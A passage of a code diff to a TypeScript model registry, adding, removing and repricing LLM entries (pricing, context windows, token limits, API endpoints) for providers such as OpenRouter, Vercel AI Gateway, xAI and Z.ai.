Model<"openai-completions">, + "xiaomi/mimo-v2-pro": { + id: "xiaomi/mimo-v2-pro", + name: "Xiaomi: MiMo-V2-Pro", + api: "openai-completions", + provider: "openrouter", + baseUrl: "https://openrouter.ai/api/v1", + reasoning: true, + input: ["text"], + cost: { + input: 1, + output: 3, + cacheRead: 0.19999999999999998, + cacheWrite: 0, + }, + contextWindow: 1048576, + maxTokens: 131072, + } satisfies Model<"openai-completions">, "z-ai/glm-4-32b": { id: "z-ai/glm-4-32b", name: "Z.ai: GLM 4 32B ", @@ -10582,23 +10666,6 @@ export const MODELS = { contextWindow: 204800, maxTokens: 204800, } satisfies Model<"openai-completions">, - "z-ai/glm-4.6:exacto": { - id: "z-ai/glm-4.6:exacto", - name: "Z.ai: GLM 4.6 (exacto)", - api: "openai-completions", - provider: "openrouter", - baseUrl: "https://openrouter.ai/api/v1", - reasoning: true, - input: ["text"], - cost: { - input: 0.44, - output: 1.76, - cacheRead: 0.11, - cacheWrite: 0, - }, - contextWindow: 204800, - maxTokens: 131072, - } satisfies Model<"openai-completions">, "z-ai/glm-4.6v": { id: "z-ai/glm-4.6v", name: "Z.ai: GLM 4.6V", @@ -10625,13 +10692,13 @@ export const MODELS = { reasoning: true, input: ["text"], cost: { - input: 0.38, - output: 1.9800000000000002, - cacheRead: 0.19, + input: 0.39, + output: 1.75, + cacheRead: 0.195, cacheWrite: 0, }, contextWindow: 202752, - maxTokens: 4096, + maxTokens: 65535, } satisfies Model<"openai-completions">, "z-ai/glm-4.7-flash": { id: "z-ai/glm-4.7-flash", @@ -10664,8 +10731,25 @@ export const MODELS = { cacheRead: 0.119, cacheWrite: 0, }, + contextWindow: 80000, + maxTokens: 131072, + } satisfies Model<"openai-completions">, + "z-ai/glm-5-turbo": { + id: "z-ai/glm-5-turbo", + name: "Z.ai: GLM 5 Turbo", + api: "openai-completions", + provider: "openrouter", + baseUrl: "https://openrouter.ai/api/v1", + reasoning: true, + input: ["text"], + cost: { + input: 0.96, + output: 3.1999999999999997, + cacheRead: 0.192, + cacheWrite: 0, + }, contextWindow: 202752, - maxTokens: 4096, + maxTokens: 131072, } satisfies Model<"openai-completions">, }, "vercel-ai-gateway": { @@ -10678,7 +10762,7 @@ export const MODELS = { reasoning: true, input: ["text"], cost: { - input: 0.06, + input: 0.12, output: 0.24, cacheRead: 0, cacheWrite: 0, @@ -10729,13 +10813,13 @@ export const MODELS = { reasoning: true, input: ["text"], cost: { - input: 0.09999999999999999, - output: 0.3, - cacheRead: 0, + input: 0.29, + output: 0.59, + cacheRead: 0.145, cacheWrite: 0, }, - contextWindow: 40960, - maxTokens: 16384, + contextWindow: 131072, + maxTokens: 40960, } satisfies Model<"anthropic-messages">, "alibaba/qwen3-235b-a22b-thinking": { id: "alibaba/qwen3-235b-a22b-thinking", @@ -10746,9 +10830,9 @@ export const MODELS = { reasoning: true, input: ["text", "image"], cost: { - input: 0.3, - output: 2.9000000000000004, - cacheRead: 0, + input: 0.22999999999999998, + output: 2.3, + cacheRead: 0.19999999999999998, cacheWrite: 0, }, contextWindow: 262114, @@ -10765,7 +10849,7 @@ export const MODELS = { cost: { input: 0.39999999999999997, output: 1.5999999999999999, - cacheRead: 0, + cacheRead: 0.022, cacheWrite: 0, }, contextWindow: 262144, @@ -10780,13 +10864,13 @@ export const MODELS = { reasoning: true, input: ["text"], cost: { - input: 0.07, - output: 0.27, + input: 0.15, + output: 0.6, cacheRead: 0, cacheWrite: 0, }, - contextWindow: 160000, - maxTokens: 32768, + contextWindow: 262144, + maxTokens: 8192, } satisfies Model<"anthropic-messages">, "alibaba/qwen3-coder-next": { id: "alibaba/qwen3-coder-next", @@ -10794,7 +10878,7 @@ export const MODELS = { api: "anthropic-messages", provider: "vercel-ai-gateway", baseUrl: "https://ai-gateway.vercel.sh", - reasoning: true, + reasoning: false, input: ["text"], cost: { input: 0.5, @@ -10822,6 +10906,23 @@ export const MODELS = { contextWindow: 1000000, maxTokens: 65536, } satisfies Model<"anthropic-messages">, + "alibaba/qwen3-max": { + id: "alibaba/qwen3-max", + name: "Qwen3 Max", + api: "anthropic-messages", + provider: "vercel-ai-gateway", + baseUrl: "https://ai-gateway.vercel.sh", + reasoning: false, + input: ["text"], + cost: { + input: 1.2, + output: 6, + cacheRead: 0.24, + cacheWrite: 0, + }, + contextWindow: 262144, + maxTokens: 32768, + } satisfies Model<"anthropic-messages">, "alibaba/qwen3-max-preview": { id: "alibaba/qwen3-max-preview", name: "Qwen3 Max Preview", @@ -10969,8 +11070,8 @@ export const MODELS = { cost: { input: 3, output: 15, - cacheRead: 0, - cacheWrite: 0, + cacheRead: 0.3, + cacheWrite: 3.75, }, contextWindow: 200000, maxTokens: 8192, @@ -11179,6 +11280,23 @@ export const MODELS = { contextWindow: 256000, maxTokens: 8000, } satisfies Model<"anthropic-messages">, + "deepseek/deepseek-r1": { + id: "deepseek/deepseek-r1", + name: "DeepSeek-R1", + api: "anthropic-messages", + provider: "vercel-ai-gateway", + baseUrl: "https://ai-gateway.vercel.sh", + reasoning: true, + input: ["text"], + cost: { + input: 1.35, + output: 5.4, + cacheRead: 0, + cacheWrite: 0, + }, + contextWindow: 128000, + maxTokens: 8192, + } satisfies Model<"anthropic-messages">, "deepseek/deepseek-v3": { id: "deepseek/deepseek-v3", name: "DeepSeek V3 0324", @@ -11205,13 +11323,13 @@ export const MODELS = { reasoning: true, input: ["text"], cost: { - input: 0.21, - output: 0.7899999999999999, + input: 0.5, + output: 1.5, cacheRead: 0, cacheWrite: 0, }, contextWindow: 163840, - maxTokens: 128000, + maxTokens: 16384, } satisfies Model<"anthropic-messages">, "deepseek/deepseek-v3.1-terminus": { id: "deepseek/deepseek-v3.1-terminus", @@ -11224,7 +11342,7 @@ export const MODELS = { cost: { input: 0.27, output: 1, - cacheRead: 0, + cacheRead: 0.135, cacheWrite: 0, }, contextWindow: 131072, @@ -11239,9 +11357,9 @@ export const MODELS = { reasoning: false, input: ["text"], cost: { - input: 0.26, - output: 0.38, - cacheRead: 0.13, + input: 0.28, + output: 0.42, + cacheRead: 0.028, cacheWrite: 0, }, contextWindow: 128000, @@ -11264,6 +11382,40 @@ export const MODELS = { contextWindow: 128000, maxTokens: 64000, } satisfies Model<"anthropic-messages">, + "google/gemini-2.0-flash": { + id: "google/gemini-2.0-flash", + name: "Gemini 2.0 Flash", + api: "anthropic-messages", + provider: "vercel-ai-gateway", + baseUrl: "https://ai-gateway.vercel.sh", + reasoning: false, + input: ["text", "image"], + cost: { + input: 0.15, + output: 0.6, + cacheRead: 0.024999999999999998, + cacheWrite: 0, + }, + contextWindow: 1048576, + maxTokens: 8192, + } satisfies Model<"anthropic-messages">, + "google/gemini-2.0-flash-lite": { + id: "google/gemini-2.0-flash-lite", + name: "Gemini 2.0 Flash Lite", + api: "anthropic-messages", + provider: "vercel-ai-gateway", + baseUrl: "https://ai-gateway.vercel.sh", + reasoning: false, + input: ["text", "image"], + cost: { + input: 0.075, + output: 0.3, + cacheRead: 0.02, + cacheWrite: 0, + }, + contextWindow: 1048576, + maxTokens: 8192, + } satisfies Model<"anthropic-messages">, "google/gemini-2.5-flash": { id: "google/gemini-2.5-flash", name: "Gemini 2.5 Flash", @@ -11271,11 +11423,11 @@ export const MODELS = { provider: "vercel-ai-gateway", baseUrl: "https://ai-gateway.vercel.sh", reasoning: true, - input: ["text"], + input: ["text", "image"], cost: { input: 0.3, output: 2.5, - cacheRead: 0, + cacheRead: 0.03, cacheWrite: 0, }, contextWindow: 1000000, @@ -11298,40 +11450,6 @@ export const MODELS = { contextWindow: 1048576, maxTokens: 65536, } satisfies Model<"anthropic-messages">, - "google/gemini-2.5-flash-lite-preview-09-2025": { - id: "google/gemini-2.5-flash-lite-preview-09-2025", - name: "Gemini 2.5 Flash Lite Preview 09-2025", - api: "anthropic-messages", - provider: "vercel-ai-gateway", - baseUrl: "https://ai-gateway.vercel.sh", - reasoning: true, - input: ["text", "image"], - cost: { - input: 0.09999999999999999, - output: 0.39999999999999997, - cacheRead: 0.01, - cacheWrite: 0, - }, - contextWindow: 1048576, - maxTokens: 65536, - } satisfies Model<"anthropic-messages">, - "google/gemini-2.5-flash-preview-09-2025": { - id: "google/gemini-2.5-flash-preview-09-2025", - name: "Gemini 2.5 Flash Preview 09-2025", - api: "anthropic-messages", - provider: "vercel-ai-gateway", - baseUrl: "https://ai-gateway.vercel.sh", - reasoning: true, - input: ["text", "image"], - cost: { - input: 0.3, - output: 2.5, - cacheRead: 0.03, - cacheWrite: 0, - }, - contextWindow: 1000000, - maxTokens: 65536, - } satisfies Model<"anthropic-messages">, "google/gemini-2.5-pro": { id: "google/gemini-2.5-pro", name: "Gemini 2.5 Pro", @@ -11339,11 +11457,11 @@ export const MODELS = { provider: "vercel-ai-gateway", baseUrl: "https://ai-gateway.vercel.sh", reasoning: true, - input: ["text"], + input: ["text", "image"], cost: { input: 1.25, output: 10, - cacheRead: 0, + cacheRead: 0.125, cacheWrite: 0, }, contextWindow: 1048576, @@ -11364,7 +11482,7 @@ export const MODELS = { cacheWrite: 0, }, contextWindow: 1000000, - maxTokens: 64000, + maxTokens: 65000, } satisfies Model<"anthropic-messages">, "google/gemini-3-pro-preview": { id: "google/gemini-3-pro-preview", @@ -11466,7 +11584,7 @@ export const MODELS = { cacheWrite: 0, }, contextWindow: 128000, - maxTokens: 8192, + maxTokens: 100000, } satisfies Model<"anthropic-messages">, "meituan/longcat-flash-thinking": { id: "meituan/longcat-flash-thinking", @@ -11494,13 +11612,13 @@ export const MODELS = { reasoning: false, input: ["text"], cost: { - input: 0.39999999999999997, - output: 0.39999999999999997, + input: 0.72, + output: 0.72, cacheRead: 0, cacheWrite: 0, }, - contextWindow: 131072, - maxTokens: 16384, + contextWindow: 128000, + maxTokens: 8192, } satisfies Model<"anthropic-messages">, "meta/llama-3.1-8b": { id: "meta/llama-3.1-8b", @@ -11511,12 +11629,12 @@ export const MODELS = { reasoning: false, input: ["text"], cost: { - input: 0.03, - output: 0.049999999999999996, - cacheRead: 0, + input: 0.09999999999999999, + output: 0.09999999999999999, + cacheRead: 0.09999999999999999, cacheWrite: 0, }, - contextWindow: 131072, + contextWindow: 128000, maxTokens: 16384, } satisfies Model<"anthropic-messages">, "meta/llama-3.2-11b": { @@ -11579,12 +11697,12 @@ export const MODELS = { reasoning: false, input: ["text", "image"], cost: { - input: 0.15, - output: 0.6, + input: 0.24, + output: 0.9700000000000001, cacheRead: 0, cacheWrite: 0, }, - contextWindow: 131072, + contextWindow: 128000, maxTokens: 8192, } satisfies Model<"anthropic-messages">, "meta/llama-4-scout": { @@ -11596,12 +11714,12 @@ export const MODELS = { reasoning: false, input: ["text", "image"], cost: { - input: 0.08, - output: 0.3, + input: 0.16999999999999998, + output: 0.66, cacheRead: 0, cacheWrite: 0, }, - contextWindow: 131072, + contextWindow: 128000, maxTokens: 8192, } satisfies Model<"anthropic-messages">, "minimax/minimax-m2": { @@ -11632,8 +11750,8 @@ export const MODELS = { cost: { input: 0.3, output: 1.2, - cacheRead: 0.15, - cacheWrite: 0, + cacheRead: 0.03, + cacheWrite: 0.375, }, contextWindow: 204800, maxTokens: 131072, @@ -11686,8 +11804,42 @@ export const MODELS = { cacheRead: 0.03, cacheWrite: 0.375, }, - contextWindow: 4096, - maxTokens: 4096, + contextWindow: 204800, + maxTokens: 131000, + } satisfies Model<"anthropic-messages">, + "minimax/minimax-m2.7": { + id: "minimax/minimax-m2.7", + name: "Minimax M2.7", + api: "anthropic-messages", + provider: "vercel-ai-gateway", + baseUrl: "https://ai-gateway.vercel.sh", + reasoning: true, + input: ["text", "image"], + cost: { + input: 0.3, + output: 1.2, + cacheRead: 0.06, + cacheWrite: 0.375, + }, + contextWindow: 204800, + maxTokens: 131000, + } satisfies Model<"anthropic-messages">, + "minimax/minimax-m2.7-highspeed": { + id: "minimax/minimax-m2.7-highspeed", + name: "MiniMax M2.7 High Speed", + api: "anthropic-messages", + provider: "vercel-ai-gateway", + baseUrl: "https://ai-gateway.vercel.sh", + reasoning: true, + input: ["text", "image"], + cost: { + input: 0.6, + output: 2.4, + cacheRead: 0.06, + cacheWrite: 0.375, + }, + contextWindow: 204800, + maxTokens: 131100, } satisfies Model<"anthropic-messages">, "mistral/codestral": { id: "mistral/codestral", @@ -11715,8 +11867,8 @@ export const MODELS = { reasoning: false, input: ["text"], cost: { - input: 0, - output: 0, + input: 0.39999999999999997, + output: 2, cacheRead: 0, cacheWrite: 0, }, @@ -11749,8 +11901,8 @@ export const MODELS = { reasoning: false, input: ["text"], cost: { - input: 0, - output: 0, + input: 0.09999999999999999, + output: 0.3, cacheRead: 0, cacheWrite: 0, }, @@ -11766,8 +11918,8 @@ export const MODELS = { reasoning: false, input: ["text"], cost: { - input: 0.04, - output: 0.04, + input: 0.09999999999999999, + output: 0.09999999999999999, cacheRead: 0, cacheWrite: 0, }, @@ -11783,8 +11935,8 @@ export const MODELS = { reasoning: false, input: ["text"], cost: { - input: 0.09999999999999999, - output: 0.09999999999999999, + input: 0.15, + output: 0.15, cacheRead: 0, cacheWrite: 0, }, @@ -11868,14 +12020,31 @@ export const MODELS = { reasoning: false, input: ["text"], cost: { - input: 0.5, - output: 2, - cacheRead: 0, + input: 0.6, + output: 2.5, + cacheRead: 0.15, cacheWrite: 0, }, contextWindow: 131072, maxTokens: 16384, } satisfies Model<"anthropic-messages">, + "moonshotai/kimi-k2-0905": { + id: "moonshotai/kimi-k2-0905", + name: "Kimi K2 0905", + api: "anthropic-messages", + provider: "vercel-ai-gateway", + baseUrl: "https://ai-gateway.vercel.sh", + reasoning: false, + input: ["text"], + cost: { + input: 0.6, + output: 2.5, + cacheRead: 0.15, + cacheWrite: 0, + }, + contextWindow: 256000, + maxTokens: 16384, + } satisfies Model<"anthropic-messages">, "moonshotai/kimi-k2-thinking": { id: "moonshotai/kimi-k2-thinking", name: "Kimi K2 Thinking", @@ -11885,13 +12054,13 @@ export const MODELS = { reasoning: true, input: ["text"], cost: { - input: 0.47, - output: 2, - cacheRead: 0.14100000000000001, + input: 0.6, + output: 2.5, + cacheRead: 0.15, cacheWrite: 0, }, - contextWindow: 216144, - maxTokens: 216144, + contextWindow: 262114, + maxTokens: 262114, } satisfies Model<"anthropic-messages">, "moonshotai/kimi-k2-thinking-turbo": { id: "moonshotai/kimi-k2-thinking-turbo", @@ -11919,9 +12088,9 @@ export const MODELS = { reasoning: false, input: ["text"], cost: { - input: 2.4, - output: 10, - cacheRead: 0, + input: 1.15, + output: 8, + cacheRead: 0.15, cacheWrite: 0, }, contextWindow: 256000, @@ -11936,13 +12105,13 @@ export const MODELS = { reasoning: true, input: ["text", "image"], cost: { - input: 0.5, - output: 2.8, - cacheRead: 0, + input: 0.6, + output: 3, + cacheRead: 0.09999999999999999, cacheWrite: 0, }, - contextWindow: 256000, - maxTokens: 256000, + contextWindow: 262114, + maxTokens: 262114, } satisfies Model<"anthropic-messages">, "nvidia/nemotron-nano-12b-v2-vl": { id: "nvidia/nemotron-nano-12b-v2-vl", @@ -11970,31 +12139,14 @@ export const MODELS = { reasoning: true, input: ["text"], cost: { - input: 0.04, - output: 0.16, + input: 0.06, + output: 0.22999999999999998, cacheRead: 0, cacheWrite: 0, }, contextWindow: 131072, maxTokens: 131072, } satisfies Model<"anthropic-messages">, - "openai/codex-mini": { - id: "openai/codex-mini", - name: "Codex Mini", - api: "anthropic-messages", - provider: "vercel-ai-gateway", - baseUrl: "https://ai-gateway.vercel.sh", - reasoning: true, - input: ["text", "image"], - cost: { - input: 1.5, - output: 6, - cacheRead: 0.375, - cacheWrite: 0, - }, - contextWindow: 200000, - maxTokens: 100000, - } satisfies Model<"anthropic-messages">, "openai/gpt-4-turbo": { id: "openai/gpt-4-turbo", name: "GPT-4 Turbo", @@ -12057,7 +12209,7 @@ export const MODELS = { cost: { input: 0.09999999999999999, output: 0.39999999999999997, - cacheRead: 0.03, + cacheRead: 0.024999999999999998, cacheWrite: 0, }, contextWindow: 1047576, @@ -12108,7 +12260,7 @@ export const MODELS = { cost: { input: 1.25, output: 10, - cacheRead: 0.13, + cacheRead: 0.125, cacheWrite: 0, }, contextWindow: 400000, @@ -12138,11 +12290,11 @@ export const MODELS = { provider: "vercel-ai-gateway", baseUrl: "https://ai-gateway.vercel.sh", reasoning: true, - input: ["text", "image"], + input: ["text"], cost: { input: 1.25, output: 10, - cacheRead: 0.13, + cacheRead: 0.125, cacheWrite: 0, }, contextWindow: 400000, @@ -12159,7 +12311,7 @@ export const MODELS = { cost: { input: 0.25, output: 2, - cacheRead: 0.03, + cacheRead: 0.024999999999999998, cacheWrite: 0, }, contextWindow: 400000, @@ -12176,7 +12328,7 @@ export const MODELS = { cost: { input: 0.049999999999999996, output: 0.39999999999999997, - cacheRead: 0.01, + cacheRead: 0.005, cacheWrite: 0, }, contextWindow: 400000, @@ -12210,7 +12362,7 @@ export const MODELS = { cost: { input: 1.25, output: 10, - cacheRead: 0.13, + cacheRead: 0.125, cacheWrite: 0, }, contextWindow: 400000, @@ -12261,7 +12413,7 @@ export const MODELS = { cost: { input: 1.25, output: 10, - cacheRead: 0.13, + cacheRead: 0.125, cacheWrite: 0, }, contextWindow: 128000, @@ -12278,7 +12430,7 @@ export const MODELS = { cost: { input: 1.25, output: 10, - cacheRead: 0.13, + cacheRead: 0.125, cacheWrite: 0, }, contextWindow: 400000, @@ -12295,7 +12447,7 @@ export const MODELS = { cost: { input: 1.75, output: 14, - cacheRead: 0.18, + cacheRead: 0.175, cacheWrite: 0, }, contextWindow: 400000, @@ -12400,7 +12552,41 @@ export const MODELS = { cacheRead: 0.25, cacheWrite: 0, }, - contextWindow: 200000, + contextWindow: 1050000, + maxTokens: 128000, + } satisfies Model<"anthropic-messages">, + "openai/gpt-5.4-mini": { + id: "openai/gpt-5.4-mini", + name: "GPT 5.4 Mini", + api: "anthropic-messages", + provider: "vercel-ai-gateway", + baseUrl: "https://ai-gateway.vercel.sh", + reasoning: true, + input: ["text", "image"], + cost: { + input: 0.75, + output: 4.5, + cacheRead: 0.075, + cacheWrite: 0, + }, + contextWindow: 400000, + maxTokens: 128000, + } satisfies Model<"anthropic-messages">, + "openai/gpt-5.4-nano": { + id: "openai/gpt-5.4-nano", + name: "GPT 5.4 Nano", + api: "anthropic-messages", + provider: "vercel-ai-gateway", + baseUrl: "https://ai-gateway.vercel.sh", + reasoning: true, + input: ["text", "image"], + cost: { + input: 0.19999999999999998, + output: 1.25, + cacheRead: 0.02, + cacheWrite: 0, + }, + contextWindow: 400000, maxTokens: 128000, } satisfies Model<"anthropic-messages">, "openai/gpt-5.4-pro": { @@ -12420,23 +12606,6 @@ export const MODELS = { contextWindow: 1050000, maxTokens: 128000, } satisfies Model<"anthropic-messages">, - "openai/gpt-oss-120b": { - id: "openai/gpt-oss-120b", - name: "gpt-oss-120b", - api: "anthropic-messages", - provider: "vercel-ai-gateway", - baseUrl: "https://ai-gateway.vercel.sh", - reasoning: true, - input: ["text"], - cost: { - input: 0.09999999999999999, - output: 0.5, - cacheRead: 0, - cacheWrite: 0, - }, - contextWindow: 131072, - maxTokens: 131072, - } satisfies Model<"anthropic-messages">, "openai/gpt-oss-20b": { id: "openai/gpt-oss-20b", name: "gpt-oss-20b", @@ -12624,40 +12793,6 @@ export const MODELS = { contextWindow: 131072, maxTokens: 131072, } satisfies Model<"anthropic-messages">, - "vercel/v0-1.0-md": { - id: "vercel/v0-1.0-md", - name: "v0-1.0-md", - api: "anthropic-messages", - provider: "vercel-ai-gateway", - baseUrl: "https://ai-gateway.vercel.sh", - reasoning: false, - input: ["text", "image"], - cost: { - input: 3, - output: 15, - cacheRead: 0, - cacheWrite: 0, - }, - contextWindow: 128000, - maxTokens: 32000, - } satisfies Model<"anthropic-messages">, - "vercel/v0-1.5-md": { - id: "vercel/v0-1.5-md", - name: "v0-1.5-md", - api: "anthropic-messages", - provider: "vercel-ai-gateway", - baseUrl: "https://ai-gateway.vercel.sh", - reasoning: false, - input: ["text", "image"], - cost: { - input: 3, - output: 15, - cacheRead: 0, - cacheWrite: 0, - }, - contextWindow: 128000, - maxTokens: 32768, - } satisfies Model<"anthropic-messages">, "xai/grok-2-vision": { id: "xai/grok-2-vision", name: "Grok 2 Vision", @@ -12686,7 +12821,7 @@ export const MODELS = { cost: { input: 3, output: 15, - cacheRead: 0, + cacheRead: 0.75, cacheWrite: 0, }, contextWindow: 131072, @@ -12703,7 +12838,7 @@ export const MODELS = { cost: { input: 5, output: 25, - cacheRead: 0, + cacheRead: 1.25, cacheWrite: 0, }, contextWindow: 131072, @@ -12720,7 +12855,7 @@ export const MODELS = { cost: { input: 0.3, output: 0.5, - cacheRead: 0, + cacheRead: 0.075, cacheWrite: 0, }, contextWindow: 131072, @@ -12754,7 +12889,7 @@ export const MODELS = { cost: { input: 3, output: 15, - cacheRead: 0, + cacheRead: 0.75, cacheWrite: 0, }, contextWindow: 256000, @@ -12828,6 +12963,57 @@ export const MODELS = { contextWindow: 2000000, maxTokens: 30000, } satisfies Model<"anthropic-messages">, + "xai/grok-4.20-multi-agent-beta": { + id: "xai/grok-4.20-multi-agent-beta", + name: "Grok 4.20 Multi Agent Beta", + api: "anthropic-messages", + provider: "vercel-ai-gateway", + baseUrl: "https://ai-gateway.vercel.sh", + reasoning: true, + input: ["text"], + cost: { + input: 2, + output: 6, + cacheRead: 0.19999999999999998, + cacheWrite: 0, + }, + contextWindow: 2000000, + maxTokens: 2000000, + } satisfies Model<"anthropic-messages">, + "xai/grok-4.20-non-reasoning-beta": { + id: "xai/grok-4.20-non-reasoning-beta", + name: "Grok 4.20 Beta Non-Reasoning", + api: "anthropic-messages", + provider: "vercel-ai-gateway", + baseUrl: "https://ai-gateway.vercel.sh", + reasoning: false, + input: ["text", "image"], + cost: { + input: 2, + output: 6, + cacheRead: 0.19999999999999998, + cacheWrite: 0, + }, + contextWindow: 2000000, + maxTokens: 2000000, + } satisfies Model<"anthropic-messages">, + "xai/grok-4.20-reasoning-beta": { + id: "xai/grok-4.20-reasoning-beta", + name: "Grok 4.20 Beta Reasoning", + api: "anthropic-messages", + provider: "vercel-ai-gateway", + baseUrl: "https://ai-gateway.vercel.sh", + reasoning: true, + input: ["text", "image"], + cost: { + input: 2, + output: 6, + cacheRead: 0.19999999999999998, + cacheWrite: 0, + }, + contextWindow: 2000000, + maxTokens: 2000000, + } satisfies Model<"anthropic-messages">, "xai/grok-code-fast-1": { id: "xai/grok-code-fast-1", name: "Grok Code Fast 1", @@ -12854,14 +13040,31 @@ export const MODELS = { reasoning: true, input: ["text"], cost: { - input: 0.09, - output: 0.29, - cacheRead: 0, + input: 0.09999999999999999, + output: 0.3, + cacheRead: 0.02, cacheWrite: 0, }, contextWindow: 262144, maxTokens: 32000, } satisfies Model<"anthropic-messages">, + "xiaomi/mimo-v2-pro": { + id: "xiaomi/mimo-v2-pro", + name: "MiMo V2 Pro", + api: "anthropic-messages", + provider: "vercel-ai-gateway", + baseUrl: "https://ai-gateway.vercel.sh", + reasoning: true, + input: ["text"], + cost: { + input: 1, + output: 3, + cacheRead: 0.19999999999999998, + cacheWrite: 0, + }, + contextWindow: 1000000, + maxTokens: 128000, + } satisfies Model<"anthropic-messages">, "zai/glm-4.5": { id: "zai/glm-4.5", name: "GLM-4.5", @@ -12873,11 +13076,11 @@ export const MODELS = { cost: { input: 0.6, output: 2.2, - cacheRead: 0, + cacheRead: 0.11, cacheWrite: 0, }, - contextWindow: 131072, - maxTokens: 131072, + contextWindow: 128000, + maxTokens: 96000, } satisfies Model<"anthropic-messages">, "zai/glm-4.5-air": { id: "zai/glm-4.5-air", @@ -12902,16 +13105,16 @@ export const MODELS = { api: "anthropic-messages", provider: "vercel-ai-gateway", baseUrl: "https://ai-gateway.vercel.sh", - reasoning: true, + reasoning: false, input: ["text", "image"], cost: { input: 0.6, output: 1.7999999999999998, - cacheRead: 0, + cacheRead: 0.11, cacheWrite: 0, }, - contextWindow: 65536, - maxTokens: 16384, + contextWindow: 66000, + maxTokens: 16000, } satisfies Model<"anthropic-messages">, "zai/glm-4.6": { id: "zai/glm-4.6", @@ -12922,8 +13125,8 @@ export const MODELS = { reasoning: true, input: ["text"], cost: { - input: 0.44999999999999996, - output: 1.7999999999999998, + input: 0.6, + output: 2.2, cacheRead: 0.11, cacheWrite: 0, }, @@ -12973,14 +13176,31 @@ export const MODELS = { reasoning: true, input: ["text"], cost: { - input: 0.43, - output: 1.75, - cacheRead: 0.08, + input: 0.6, + output: 2.2, + cacheRead: 0, cacheWrite: 0, }, - contextWindow: 202752, + contextWindow: 200000, maxTokens: 120000, } satisfies Model<"anthropic-messages">, + "zai/glm-4.7-flash": { + id: "zai/glm-4.7-flash", + name: "GLM 4.7 Flash", + api: "anthropic-messages", + provider: "vercel-ai-gateway", + baseUrl: "https://ai-gateway.vercel.sh", + reasoning: true, + input: ["text"], + cost: { + input: 0.07, + output: 0.39999999999999997, + cacheRead: 0, + cacheWrite: 0, + }, + contextWindow: 200000, + maxTokens: 131000, + } satisfies Model<"anthropic-messages">, "zai/glm-4.7-flashx": { id: "zai/glm-4.7-flashx", name: "GLM 4.7 FlashX", @@ -13000,7 +13220,7 @@ export const MODELS = { } satisfies Model<"anthropic-messages">, "zai/glm-5": { id: "zai/glm-5", - name: "GLM-5", + name: "GLM 5", api: "anthropic-messages", provider: "vercel-ai-gateway", baseUrl: "https://ai-gateway.vercel.sh", @@ -13013,7 +13233,24 @@ export const MODELS = { cacheWrite: 0, }, contextWindow: 202800, - maxTokens: 131072, + maxTokens: 131100, + } satisfies Model<"anthropic-messages">, + "zai/glm-5-turbo": { + id: "zai/glm-5-turbo", + name: "GLM 5 Turbo", + api: "anthropic-messages", + provider: "vercel-ai-gateway", + baseUrl: "https://ai-gateway.vercel.sh", + reasoning: true, + input: ["text"], + cost: { + input: 1.2, + output: 4, + cacheRead: 0.24, + cacheWrite: 0, + }, + contextWindow: 202800, + maxTokens: 131100, } satisfies Model<"anthropic-messages">, }, "xai": { @@ -13340,6 +13577,40 @@ export const MODELS = { contextWindow: 2000000, maxTokens: 30000, } satisfies Model<"openai-completions">, + "grok-4.20-0309-non-reasoning": { + id: "grok-4.20-0309-non-reasoning", + name: "Grok 4.20 (Non-Reasoning)", + api: "openai-completions", + provider: "xai", + baseUrl: "https://api.x.ai/v1", + reasoning: false, + input: ["text", "image"], + cost: { + input: 2, + output: 6, + cacheRead: 0.2, + cacheWrite: 0, + }, + contextWindow: 2000000, + maxTokens: 30000, + } satisfies Model<"openai-completions">, + "grok-4.20-0309-reasoning": { + id: "grok-4.20-0309-reasoning", + name: "Grok 4.20 (Reasoning)", + api: "openai-completions", + provider: "xai", + baseUrl: "https://api.x.ai/v1", + reasoning: true, + input: ["text", "image"], + cost: { + input: 2, + output: 6, + cacheRead: 0.2, + cacheWrite: 0, + }, + contextWindow: 2000000, + maxTokens: 30000, + } satisfies Model<"openai-completions">, "grok-beta": { id: "grok-beta", name: "Grok Beta", @@ -13555,747 +13826,23 @@ export const MODELS = { contextWindow: 204800, maxTokens: 131072, } satisfies Model<"openai-completions">, - }, - "alibaba-coding-plan": { - "qwen3.5-plus": { - id: "qwen3.5-plus", - name: "Qwen3.5 Plus", + "glm-5-turbo": { + id: "glm-5-turbo", + name: "GLM-5-Turbo", api: "openai-completions", - provider: "alibaba-coding-plan", - baseUrl: "https://coding-intl.dashscope.aliyuncs.com/v1", + provider: "zai", + baseUrl: "https://api.z.ai/api/coding/paas/v4", + compat: {"supportsDeveloperRole":false,"thinkingFormat":"zai"}, reasoning: true, input: ["text"], cost: { - input: 0, - output: 0, - cacheRead: 0, + input: 1.2, + output: 4, + cacheRead: 0.24, cacheWrite: 0, }, - contextWindow: 983616, - maxTokens: 65536, - compat: { thinkingFormat: "qwen", supportsDeveloperRole: false }, - } satisfies Model<"openai-completions">, - "qwen3-max-2026-01-23": { - id: "qwen3-max-2026-01-23", - name: "Qwen3 Max 2026-01-23", - api: "openai-completions", - provider: "alibaba-coding-plan", - baseUrl: "https://coding-intl.dashscope.aliyuncs.com/v1", - reasoning: true, - input: ["text"], - cost: { - input: 0, - output: 0, - cacheRead: 0, - cacheWrite: 0, - }, - contextWindow: 258048, - maxTokens: 32768, - compat: { thinkingFormat: "qwen", supportsDeveloperRole: false }, - } satisfies Model<"openai-completions">, - "qwen3-coder-next": { - id: "qwen3-coder-next", - name: "Qwen3 Coder Next", - api: "openai-completions", - provider: "alibaba-coding-plan", - baseUrl: "https://coding-intl.dashscope.aliyuncs.com/v1", - reasoning: false, - input: ["text"], - cost: { - input: 0, - output: 0, - cacheRead: 0, - cacheWrite: 0, - }, - contextWindow: 204800, - maxTokens: 65536, - compat: { supportsDeveloperRole: false }, - } satisfies Model<"openai-completions">, - "qwen3-coder-plus": { - id: "qwen3-coder-plus", - name: "Qwen3 Coder Plus", - api: "openai-completions", - provider: "alibaba-coding-plan", - baseUrl: "https://coding-intl.dashscope.aliyuncs.com/v1", - reasoning: false, - input: ["text"], - cost: { - input: 0, - output: 0, - cacheRead: 0, - cacheWrite: 0, - }, - contextWindow: 997952, - maxTokens: 65536, - compat: { supportsDeveloperRole: false }, - } satisfies Model<"openai-completions">, - "MiniMax-M2.5": { - id: "MiniMax-M2.5", - name: "MiniMax M2.5", - api: "openai-completions", - provider: "alibaba-coding-plan", - baseUrl: "https://coding-intl.dashscope.aliyuncs.com/v1", - reasoning: true, - input: ["text"], - cost: { - input: 0, - output: 0, - cacheRead: 0, - cacheWrite: 0, - }, - contextWindow: 196608, - maxTokens: 65536, - compat: { supportsStore: false, supportsDeveloperRole: false, supportsReasoningEffort: true, maxTokensField: "max_tokens" }, - } satisfies Model<"openai-completions">, - "glm-5": { - id: "glm-5", - name: "GLM-5", - 